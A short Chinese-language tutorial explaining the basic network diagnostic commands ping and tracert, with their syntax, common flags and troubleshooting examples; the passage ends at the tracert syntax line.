网络测试常用命令网络不通，求助于网管时，经常会看到网管检测和处理网络故障，用到一些命令，了解和掌握下面几个命令将会有助于你更快地检测到网络故障所在，从而节省时间，提高效率。 Ping Ping是测试网络联接状况以及信息包发送和接收状况非常有用的工具，是网络测试最常用的命令。Ping向目标主机（地址）发送一个回送请求数据包，要求目标主机收到请求后给予答复，从而判断网络的响应时间和本机是否与目标主机（地址）联通。 如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线故障，网络适配器配置不正确，IP地址不正确。如果执行Ping成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证本机与目标主机间存在一条连通的物理路径。 命令格式： ping IP地址或主机名[-t] [-a] [-n count] [-l size] 参数含义： -t不停地向目标主机发送数据； -a 以IP地址格式来显示目标主机的网络地址； -n count 指定要Ping多少次，具体次数由count来指定； -l size 指定发送到目标主机的数据包的大小。 例如当您的机器不能访问Internet，首先您想确认是否是本地局域网的故障。假定局域网的代理服务器IP地址为202.168.0.1，您可以使用Ping避免202.168.0.1命令查看本机是否和代理服务器联通。又如，测试本机的网卡是否正确安装的常用命令是ping 1 27.0.0.1。 Tracert Tracert命令用来显示数据包到达目标主机所经过的路径，并显示到达每个节点的时间。命令功能同Ping类似，但它所获得的信息要比Ping命令详细得多，它把数据包所走的全部路径、节点的IP以及花费的时间都显示出来。该命令比较适用于大型网络。 命令格式： tracert IP地址或主机名[-d][-h maximumhops][-j host_list] [-w timeout]